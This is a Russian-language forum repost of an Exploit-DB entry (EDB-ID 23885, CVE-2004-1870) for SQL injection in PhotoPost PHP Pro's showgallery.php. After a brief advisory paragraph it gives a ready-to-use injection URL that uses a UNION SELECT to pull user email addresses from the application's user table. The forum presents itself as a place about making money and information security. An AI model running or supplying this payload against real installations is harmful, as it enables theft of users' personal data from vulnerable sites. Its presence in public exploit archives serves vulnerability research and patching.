PhotoPost PHP Pro 3.x/4.x - 'showgallery.php' Multiple SQL Injections | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 23885

Проверка EDB

Пройдено

Автор: JEIAR

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2004-1870

Дата публикации: 2004-03-29

Код:

source: https://www.securityfocus.com/bid/9994/info

Multiple SQL injection, cross-site scripting and HTML injection vulnerabilities have been identified in the application, which may allow an attacker to execute arbitrary HTML or script code in a user's browser and/or influence SQL query logic to disclose sensitive information and carry out other attacks. 

Photopost PHP Pro 4.6.0 and prior may be prone to these issues. Photopost PHP Pro 4.8.1 is reported vulnerable to these issues as well.

http://www.example.com/showgallery.php?ppuser=-2'%20UNION%20SELECT%200,email,
0,0,0,0,0,0%20FROM%20user%20WHERE%20userid='1&cat=500

Источник: www.exploit-db.com

Поиск

Exploit PhotoPost PHP Pro 3.x/4.x - 'showgallery.php' Multiple SQL Injections

Exploiter

Похожие темы